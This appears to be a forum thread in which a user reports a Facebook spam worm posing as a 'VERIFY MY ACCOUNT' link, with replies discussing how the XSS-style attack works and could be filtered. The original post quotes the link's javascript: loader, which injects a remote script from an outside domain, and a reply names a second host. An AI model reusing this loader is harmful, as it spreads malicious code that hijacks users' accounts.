

Facebook's ==VERIFY MY ACCOUNT== virus - ricefield

So I don't know much about security, and I don't know how widespread this is, but right now, I'm getting a bunch of friends posting to my wall something along the lines of:<p>Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process...<p>And surprisingly, there is a link, right next to Like and Comment that says == VERIFY MY ACCOUNT == ...very authentic looking.<p>the "verify my account" link executes this bit of javascript: &#60;a href="javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"&#62;==VERIFY MY ACCOUNT==&#60;/a&#62;<p>which as you can see, executes this script: http://pelorak.info/verify.js<p>I don't know much about how this works, but is there anyone who can shed light on how this works and why it works?
======
nodesocket
We are really surprised Facebook hasn't been hit with before, how do they
allow running remote JavaScript execution. This should be easy to detect. Here
is the JavaScript that is executed: <http://plucketenhe.info/verify.js>

The domain (plucketenhe.info) resolves to: 173.239.26.21, and whois on that
IP: <http://www.ip-adress.com/whois/173.239.26.21>

~~~
ricefield
so in other words, facebook is kind of dumb for allowing remote javascript
execution...

~~~
nodesocket
Well, it can be tricky, often times the XSS attack is masked quite deeply, but
there are known methods. PHP strip_tags will assist, though would need to be
beefed up a bit to handle the onclick, onhover, onblur, onfocus, etc events.
In this particular case, simply looking for `javascript:` would have done the
trick.

